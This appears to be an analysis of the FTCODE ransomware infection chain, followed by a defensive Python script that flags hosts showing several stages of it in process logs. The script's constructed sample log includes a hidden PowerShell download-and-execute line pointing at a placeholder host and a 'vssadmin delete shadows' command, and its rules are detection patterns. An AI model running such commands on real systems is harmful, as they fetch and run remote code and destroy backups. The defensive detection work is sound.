FTCODE ransomware encrypts user data with AES-256 (in CBC mode) + RSA-1024 and then demands a ransom of $500 to return the files. FTCODE mainly targets Italian companies. It is spread via an email spam campaign previously known to distribute JasperLoader and Gootkit: an invoice-themed email aimed at Italian users, in which the attackers attempt to convince the recipient to enable macros in an attached Word document.
The macro runs PowerShell to retrieve additional PowerShell code. This second stage then issues a GET request to a remote URL to obtain a Visual Basic file similar to JasperLoader. Using JasperLoader as an installer, FTCODE prepares the environment by checking that the host is not already infected, generating a GUID and creating a unique password for the host. Some system information, along with the GUID and password, is sent to the attacker's command and control server via a POST request. It also performs common ransomware functions such as deleting backups and shadow copies. Finally, files matching a list of targeted extensions are encrypted, and a ransom note is left on the system with payment instructions for file recovery.
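The chain above (Office document spawning PowerShell, PowerShell fetching further code, a script host running a .vbs installer, shadow copies being deleted) is what a defender can key on in process-creation telemetry. The following is an added example written for this page, not code from the original write-up and not anything belonging to FTCODE itself: it scores each host on how many distinct stages of that chain appear in its logs. The pipe-separated log format (host|parent image|image|command line), the rule names and every sample log line are constructed assumptions; real Sysmon or EDR records would need their own parser but the same rules apply.

```python
"""Detect an FTCODE-style infection chain in process-creation logs.

Added example, not part of the original write-up. The log format,
the rule names and all sample lines below are constructed.
"""
import re

# Rules: (name, parent_image_re, image_re, command_line_re), matched
# case-insensitively; an empty pattern matches anything. Each rule is
# one stage of the chain described in the text.
RULES = [
    ("office_spawns_powershell", r"winword\.exe$", r"powershell\.exe$", r""),
    ("powershell_downloads_code", r"", r"powershell\.exe$",
     r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"),
    ("script_host_runs_vbs", r"", r"(wscript|cscript)\.exe$", r"\.vbs\b"),
    ("shadow_copies_deleted", r"", r"(vssadmin|wmic)\.exe$",
     r"delete\s+shadows|shadowcopy\s+delete"),
]

# Constructed sample telemetry: host|parent image|image|command line.
# WS01 shows the full chain; WS02 and WS03 are benign look-alikes.
SAMPLE_LOG = r"""
WS01|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
WS01|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\wscript.exe|wscript.exe C:\Users\user\AppData\Local\Temp\installer.vbs
WS01|C:\Windows\System32\wscript.exe|C:\Windows\System32\vssadmin.exe|vssadmin.exe delete shadows /all /quiet
WS02|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-ChildItem C:\Logs
WS03|C:\Windows\System32\cmd.exe|C:\Windows\System32\vssadmin.exe|vssadmin.exe list shadows
"""


def parse_line(line):
    """Split one record; the command line may itself contain '|'."""
    host, parent, image, cmd = line.split("|", 3)
    return host.strip(), parent.strip(), image.strip(), cmd.strip()


def match_rules(parent, image, cmd):
    """Return the names of every rule this single event satisfies."""
    hits = []
    for name, p_re, i_re, c_re in RULES:
        if (re.search(p_re, parent, re.I)
                and re.search(i_re, image, re.I)
                and re.search(c_re, cmd, re.I)):
            hits.append(name)
    return hits


def stages_per_host(log_text):
    """Map host -> distinct stage names, in order of first appearance."""
    found = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        host, parent, image, cmd = parse_line(line)
        for name in match_rules(parent, image, cmd):
            stages = found.setdefault(host, [])
            if name not in stages:
                stages.append(name)
    return found


def alert_hosts(found, min_stages=2):
    """Hosts showing at least min_stages distinct stages of the chain.

    A single stage (e.g. one shadow-copy deletion by an admin) is noisy;
    two or more stages on the same host is a strong signal.
    """
    return sorted(h for h, s in found.items() if len(s) >= min_stages)


if __name__ == "__main__":
    found = stages_per_host(SAMPLE_LOG)
    for host, stages in found.items():
        print(host, "->", ", ".join(stages))
    print("alert:", alert_hosts(found))
```

Requiring two or more distinct stages per host is what keeps this usable: `vssadmin list shadows` on WS03 and an ordinary PowerShell invocation on WS02 never match, and even a lone `vssadmin delete shadows` from a backup script would stay below the threshold, while WS01 trips all four stages.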